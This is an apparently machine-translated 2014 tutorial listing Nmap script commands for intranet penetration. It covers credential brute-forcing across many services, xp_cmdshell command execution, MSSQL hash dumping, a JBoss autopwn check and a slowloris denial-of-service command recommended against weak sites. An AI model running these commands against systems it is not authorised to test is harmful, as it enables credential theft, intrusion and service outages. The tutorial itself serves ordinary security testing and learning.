Nmap Script Use Summary (Turn cloudy) under

Nmap Script Use summary clzzy2014/06/08 11:24

<:section class= "Entry-content ng-binding" ng-bind-html= "postcontenttrustedhtml" >

0x00 Preface:

Nmap Basic Introduction and basic use method, in the dark cloud knowledge base has already been submitted, speak of more detailed, in this article no longer tell. Specific Link: http://drops.wooyun.org/tips/2002

This article mainly explains the use of many of Nmap's scripts, especially useful when infiltrating the intranet.

0x01 nmap Scan by script category

Nmap script is mainly divided into the following categories, in the scan can be set according to the--script= category this way to do a more general scan:

auth: 负责处理鉴权证书（绕开鉴权）的脚本  broadcast: 在局域网内探查更多服务开启状况，如dhcp/dns/sqlserver等服务  brute: 提供暴力破解方式，针对常见的应用如http/snmp等  default: 使用-sC或-A选项扫描时候默认的脚本，提供基本脚本扫描能力  discovery: 对网络进行更多的信息，如SMB枚举、SNMP查询等  dos: 用于进行拒绝服务攻击  exploit: 利用已知的漏洞入侵系统  external: 利用第三方的数据库或资源，例如进行whois解析  fuzzer: 模糊测试的脚本，发送异常的包到目标机，探测出潜在漏洞 intrusive: 入侵性的脚本，此类脚本可能引发对方的IDS/IPS的记录或屏蔽  malware: 探测目标机是否感染了病毒、开启了后门等信息  safe: 此类与intrusive相反，属于安全性脚本  version: 负责增强服务与版本扫描（Version Detection）功能的脚本  vuln: 负责检查目标机是否有常见的漏洞（Vulnerability），如是否有MS08_067

Partial use:

(1)nmap --script=auth 192.168.137.*

The script that handles the certificate of authentication (bypassing the authentication), and can also be used as the detection part to apply the weak password

(2)nmap --script=brute 192.168.137.*

Provide brute force solutions for simple passwords such as databases, SMB,SNMP, etc.

(3) nmap --script=default 192.168.137.* ornmap -sC 192.168.137.*

The default script scan, mainly collects the information of the various application service, after collecting, can then attack for the specific service

(4) nmap --script=vuln 192.168.137.*

Check for Common Vulnerabilities

(5)nmap -n -p445 --script=broadcast 192.168.137.4

Explore more service-enabled conditions within the LAN

(6) nmap --script external 202.103.243.110

Use of third-party databases or resources, such as WHOIS resolution

0x02 nmap scan by app service

(1) VNC Scan:

Check VNC Bypass

#!bashnmap  --script=realvnc-auth-bypass 192.168.137.4  

Check the VNC authentication method

#!bashnmap  --script=vnc-auth  192.168.137.4  

Get VNC Information

#!bashnmap  --script=vnc-info  192.168.137.4  

(2) SMB Scan:

SMB hack

#!bashnmap  --script=smb-brute.nse 192.168.137.4  

SMB dictionary hack

#!bashnmap --script=smb-brute.nse --script-args=userdb=/var/passwd,passdb=/var/passwd 192.168.137.4  

SMB is known to have several serious leaks

#!bashnmap  --script=smb-check-vulns.nse --script-args=unsafe=1 192.168.137.4    

View Shared Directories

#!bashnmap -p 445  --script smb-ls --script-args ‘share=e$,path=\,smbuser=test,smbpass=test’ 192.168.137.4    

Query the host for some sensitive information (note: need to download Nmap_service)

#!bashnmap -p 445 -n –script=smb-psexec --script-args= smbuser=test,smbpass=test 192.168.137.4   

viewing sessions

#!bashnmap -n -p445 --script=smb-enum-sessions.nse --script-args=smbuser=test,smbpass=test 192.168.137.4    

System Information

#!bashnmap -n -p445 --script=smb-os-discovery.nse --script-args=smbuser=test,smbpass=test 192.168.137.4  

(3) MSSQL Scan:

Guess the MSSQL user name and password

#!bashnmap -p1433 --script=ms-sql-brute --script-args=userdb=/var/passwd,passdb=/var/passwd 192.168.137.4    

xp_cmdshell Execute command

#!bashnmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=sa,ms-sql-xp-cmdshell.cmd="net user" 192.168.137.4  

Dumphash value

#!bashnmap -p 1433 --script ms-sql-dump-hashes.nse --script-args mssql.username=sa,mssql.password=sa  192.168.137.4      

(4) MySQL scan:

Scan root Empty password

#!bashnmap -p3306 --script=mysql-empty-password.nse 192.168.137.4   

List all MySQL users

#!bashnmap -p3306 --script=mysql-users.nse --script-args=mysqluser=root 192.168.137.4   

Supports all script scans for the same app

#!bashnmap --script=mysql-* 192.168.137.4  

(5) Oracle Scan:

Oracle SID Scan

Oracle Weak password hack

#!bashnmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=ORCL,userdb=/var/passwd,passdb=/var/passwd 192.168.137.5      

(6) Some other scripts that are more useful

nmap --script=broadcast-netbios-master-browser 192.168.137.4   发现网关  nmap -p 873 --script rsync-brute --script-args ‘rsync-brute.module=www‘ 192.168.137.4  破解rsync  nmap --script informix-brute -p 9088 192.168.137.4    informix数据库破解  nmap -p 5432 --script pgsql-brute 192.168.137.4       pgsql破解  nmap -sU --script snmp-brute 192.168.137.4            snmp破解  nmap -sV --script=telnet-brute 192.168.137.4          telnet破解  nmap --script=http-vuln-cve2010-0738 --script-args ‘http-vuln-cve2010-0738.paths={/path1/,/path2/}‘ <target>  jboss autopwn  nmap --script=http-methods.nse 192.168.137.4 检查http方法  nmap --script http-slowloris --max-parallelism 400 192.168.137.4  dos攻击，对于处理能力较小的站点还挺好用的 ‘half-HTTP‘ connections   nmap --script=samba-vuln-cve-2012-1182  -p 139 192.168.137.4

(7) The script is not reliable:

Vnc-brute the number of times will prohibit the connection

Pcanywhere-brute Ibid.

0x03 Learning Script Analysis

Nmap script is not ugly, so in use if you do not know the principle can directly see the use of the script can also modify some of the parameters to facilitate their own use.

Example:

About Oracle's weak password cracking:

Calling process: Oracle-brute.nse >> oracle-default-accounts.lst

The first is to call the hack script:

Based on the location of the dictionary in the script to see the default dictionary, of course, you can also add the cracked characters themselves, or modify the script or parameters to change the cracked dictionary:

Nmap Script Use Summary (Turn cloudy) under